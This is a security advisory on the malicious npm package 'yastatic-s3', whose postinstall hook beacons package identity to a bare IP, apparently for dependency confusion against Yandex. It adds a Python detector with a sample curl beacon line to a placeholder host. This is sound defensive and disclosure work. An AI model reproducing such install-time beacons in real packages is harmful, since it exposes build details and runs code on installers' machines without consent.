MAL-2026-6586
Malicious code in yastatic-s3 (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6b9f052f01ba026de50b8dd1c26ccb2fe661367414f9139676f94eccaa3b8c50)

On install, the package's postinstall lifecycle script issues an HTTP GET to a hardcoded bare IP (130.49.177.51:18080) over plain HTTP, transmitting the package name, version, and a nonce in the query string. This confirms code execution on the installer's machine and reachability to a third-party endpoint without installer consent. The package name 'yastatic-s3' and the beacon path '/p/dc-20260627-yandex-geobase' impersonate Yandex's internal 'yastatic' static-asset / geobase namespace, consistent with a dependency-confusion attack targeting Yandex builds that resolve a private package name from the public npm registry. Installer harm is concrete: any build pipeline that pulls this package contacts the attacker-controlled host at install time, revealing internal build identifiers and demonstrating attacker code execution on the host.
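The behaviour described above (an install lifecycle hook beaconing the package name and version to a bare IP over plain HTTP) can be flagged before `npm install` runs any scripts. The following is an added detection example, not code from the advisory, npm, or Yandex; the sample package.json is constructed, and the IP and path in it are placeholders rather than the advisory's indicators.

```python
"""Flag npm lifecycle scripts that beacon to a bare IP over plain HTTP.

Added example: scans the "scripts" block of a package.json for the pattern
the advisory describes. Everything here is constructed for illustration.
"""
import ipaddress
import json
import re
from urllib.parse import urlparse

# Hooks npm runs automatically during install (no user action needed).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
URL_RE = re.compile(r"https?://[^\s'\"`)]+")

def classify_url(url):
    """Return the risk findings for one URL found inside a lifecycle script."""
    findings = []
    parsed = urlparse(url)
    if parsed.scheme == "http":
        findings.append("plain-http")          # unencrypted beacon channel
    try:
        ipaddress.ip_address(parsed.hostname or "")
        findings.append("bare-ip")             # hardcoded IP, no DNS name
    except ValueError:
        pass
    if "npm_package_" in parsed.query:         # name/version leaked in query string
        findings.append("leaks-package-identity")
    return findings

def scan_package_json(text):
    """Map each risky lifecycle hook to [(url, findings), ...]; empty dict if clean."""
    scripts = json.loads(text).get("scripts", {})
    report = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [(u, classify_url(u)) for u in URL_RE.findall(cmd) if classify_url(u)]
        if hits:
            report[hook] = hits
    return report

# Constructed sample: 192.0.2.10 is a documentation-range placeholder and the
# path is invented; only the shape (name/version/nonce beacon) mirrors the advisory.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "yastatic-s3",
    "scripts": {
        "postinstall": "curl -s 'http://192.0.2.10:18080/p/placeholder?n=$npm_package_name&v=$npm_package_version&r=$RANDOM' || true",
        "test": "echo ok",
    },
})
```

Run the scan over a package tarball's package.json before installing; setting `ignore-scripts=true` in `.npmrc` stops lifecycle hooks from executing at all, which removes this beacon path regardless of detection.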
Affected packages
No fixed version published yet for yastatic-s3 (npm). Pin to a known-safe version or switch to an alternative.